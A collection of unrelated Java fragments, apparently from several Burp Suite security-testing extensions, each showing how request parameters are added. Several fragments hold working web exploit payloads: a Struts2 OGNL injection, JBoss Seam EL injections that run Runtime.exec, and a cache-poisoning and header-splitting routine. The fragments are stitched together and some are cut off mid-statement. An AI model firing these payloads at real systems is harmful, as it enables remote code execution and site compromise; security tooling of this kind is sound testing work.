IHttpRequestResponse buildRequest(String payload, boolean needCacheBuster) { byte[] request = insertionPoint.buildRequest(payload.getBytes()); if (needCacheBuster) { IParameter cacheBuster = burp.Utilities.helpers.buildParameter(Utilities.generateCanary(), "1", IParameter.PARAM_URL); request = burp.Utilities.helpers.addParameter(request, cacheBuster); } IHttpRequestResponse requestResponse = burp.Utilities.attemptRequest(service, request); //Utilities.out("Payload: "+payload+"|"+baseRequestResponse.getHttpService().getHost()); return requestResponse;// Utilities.buildRequest(baseRequestResponse, insertionPoint, payload) }
private void addParameter(String name, String value, byte type) { IParameter param = callbacks.getHelpers().buildParameter(name, value, type); requestBytes = callbacks.getHelpers().addParameter(requestBytes, param); }
IHttpRequestResponse buildRequest(String payload, boolean needCacheBuster) { byte[] request = insertionPoint.buildRequest(payload.getBytes()); if (needCacheBuster) { IParameter cacheBuster = burp.Utilities.helpers.buildParameter(Utilities.generateCanary(), "1", IParameter.PARAM_URL); request = burp.Utilities.helpers.addParameter(request, cacheBuster); } IHttpRequestResponse requestResponse = burp.Utilities.attemptRequest(baseRequestResponse.getHttpService(), request); return requestResponse;// Utilities.buildRequest(baseRequestResponse, insertionPoint, payload) }
modifiedReq = helpers.addParameter(modifiedReq, helpers.buildParameter(URLDecoder.decode(pair, "UTF-8"), "", IParameter.PARAM_URL)); modifiedReq = helpers.addParameter(modifiedReq, helpers.buildParameter(URLDecoder.decode(pair.substring(0, idx), "UTF-8"), URLDecoder.decode(pair.substring(idx + 1), "UTF-8"),
newReq = helpers.addParameter(newReq, newParam);
public byte[] injectPayloads(byte[] request, Integer requestCode) { //request = Utilities.replaceRequestLine(request, "GET @"+collabId + "/"+collabId.split("[.]")[0] + " HTTP/1.1"); //request = Utilities.addOrReplaceHeader(request, "Referer", "http://portswigger-labs.net/redirect.php?url=https://portswigger-labs.net/"+collabId); request = Utilities.addOrReplaceHeader(request, "Cache-Control", "no-transform"); for (String[] injection: injectionPoints) { String payload = injection[2].replace("%s", collab.generateCollabId(requestCode, injection[1])); // replace %h with corresponding Host header (same as with %s for Collaborator) payload = payload.replace("%h", Utilities.getHeader(request, "Host")); switch ( injection[0] ){ case "param": IParameter param = Utilities.helpers.buildParameter(injection[1], payload, IParameter.PARAM_URL); request = Utilities.helpers.removeParameter(request, param); request = Utilities.helpers.addParameter(request, param); break; case "header": request = Utilities.addOrReplaceHeader(request, injection[1], payload); break; default: Utilities.out("Unrecognised injection type: " + injection[0]); } } return request; }
case "body": httpMessage = this.burpExtensionHelpers .addParameter(httpMessage, this.burpExtensionHelpers .buildParameter(parameter.getName(), type, (byte) 1)); case "query": httpMessage = this.burpExtensionHelpers .addParameter(httpMessage, this.burpExtensionHelpers .buildParameter(parameter.getName(), type, (byte) 0));
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter("pageTitle", EL_INJECTION_TEST, IParameter.PARAM_URL) );
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter(redir, "http://www.example.com/%23", IParameter.PARAM_URL) );
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter(redir, payload, IParameter.PARAM_URL) );
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter("method:", "%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.hook[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString", IParameter.PARAM_URL) ); modifiedRawRequest = utf8rawRequest.replaceFirst("=", "").getBytes(); modifiedRawRequest = callbacks.getHelpers().addParameter(modifiedRawRequest, callbacks.getHelpers().buildParameter("hook", "HOOK_VAL", IParameter.PARAM_URL) );
byte[] rawSimpleRequestSeam = helpers.addParameter(rawRequest, helpers.buildParameter("actionOutcome", "/pwd.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}", IParameter.PARAM_URL) byte[] rawRequestSeam = helpers.addParameter(rawRequest, helpers.buildParameter("actionOutcome", "/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[" + i + "].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}}", IParameter.PARAM_URL)
byte[] newReq = helpers.removeParameter(baseRequestResponse.getRequest(), baseParam); IParameter newParam = helpers.buildParameter(param_name, baseParam.getValue(), baseParam.getType()); newReq = helpers.addParameter(newReq, helpers.buildParameter(param_name, "", baseParam.getType())); newReq = helpers.addParameter(newReq, newParam);
private boolean tryReflectCache(PayloadInjector injector, String param, IHttpRequestResponse base, int attackDedication, int i, String pathSuffix) { IHttpService service = injector.getService(); byte[] setPoisonReq = Utilities.appendToPath(injector.getInsertionPoint().buildRequest(Utilities.helpers.stringToBytes(param)), pathSuffix); IParameter cacheBuster = Utilities.helpers.buildParameter(Utilities.generateCanary(), "1", IParameter.PARAM_URL); setPoisonReq = Utilities.helpers.addParameter(setPoisonReq, cacheBuster); for (int j = attackDedication - i; j < attackDedication; j++) { Utilities.attemptRequest(service, setPoisonReq); } for (int j = attackDedication - i; j < attackDedication; j += 3) { IHttpRequestResponse getPoison = Utilities.attemptRequest(service, Utilities.appendToPath(Utilities.helpers.addParameter(base.getRequest(), cacheBuster), pathSuffix)); if (Utilities.containsBytes(getPoison.getResponse(), "wrtqv".getBytes())) { Utilities.log("Successful cache poisoning check"); String title = "Cache poisoning"; byte[] headerSplitReq = Utilities.appendToPath(injector.getInsertionPoint().buildRequest(Utilities.helpers.stringToBytes(param + "~zxcv\rvcz")), pathSuffix); cacheBuster = Utilities.helpers.buildParameter(Utilities.generateCanary(), "1", IParameter.PARAM_URL); byte[] headerSplitResp = Utilities.attemptRequest(service, Utilities.helpers.addParameter(headerSplitReq, cacheBuster)).getResponse(); if (Utilities.containsBytes(Arrays.copyOfRange(headerSplitResp, 0, Utilities.getBodyStart(headerSplitReq)), "zxcv\rvcz".getBytes())) { title = "Severe cache poisoning"; } title = title + " "+i; Utilities.callbacks.addScanIssue(new CustomScanIssue(getPoison.getHttpService(), Utilities.getURL(getPoison), getPoison, title, "Cache poisoning: '" + param + "'. Disregard the request and look for wrtqv in the response", "High", "Firm", "Investigate")); return true; } } return false; }
switch (samlContent.getType()) { case IParameter.PARAM_URL: currentMessage = helpers.addParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, IParameter.PARAM_BODY)); break; case IParameter.PARAM_BODY: currentMessage = helpers.addParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, IParameter.PARAM_URL)); break; currentMessage = helpers.addParameter(currentMessage,param);
byte[] newRequest = helpers.addParameter( messageInfo.getRequest(), helpers.buildParameter("token", token, IParameter.PARAM_BODY));
modifiedRawRequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter("Class.classLoader.URLs[0]", classLoaderStringTest, IParameter.PARAM_URL)
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter("debug", "console", IParameter.PARAM_URL) );
testReq = Utilities.helpers.addParameter(testReq, testCacheBuster); IHttpRequestResponse testResp = Utilities.attemptRequest(injector.getService(), testReq);
private void addCacheBusters(IHttpRequestResponse messageInfo) { byte[] placeHolder = Utilities.helpers.stringToBytes("$randomplz"); if (Utilities.countMatches(messageInfo.getRequest(), placeHolder) > 0) { messageInfo.setRequest( Utilities.fixContentLength(Utilities.replace(messageInfo.getRequest(), placeHolder, Utilities.helpers.stringToBytes(Utilities.generateCanary()))) ); } String cacheBusterName = null; if (Utilities.globalSettings.getBoolean("Add dynamic cachebuster")) { cacheBusterName = Utilities.generateCanary(); } else if (Utilities.globalSettings.getBoolean("Add 'fcbz' cachebuster")) { cacheBusterName = "fcbz"; } if (cacheBusterName != null) { IParameter cacheBuster = burp.Utilities.helpers.buildParameter(cacheBusterName, "1", IParameter.PARAM_URL); messageInfo.setRequest(Utilities.helpers.addParameter(messageInfo.getRequest(), cacheBuster)); } }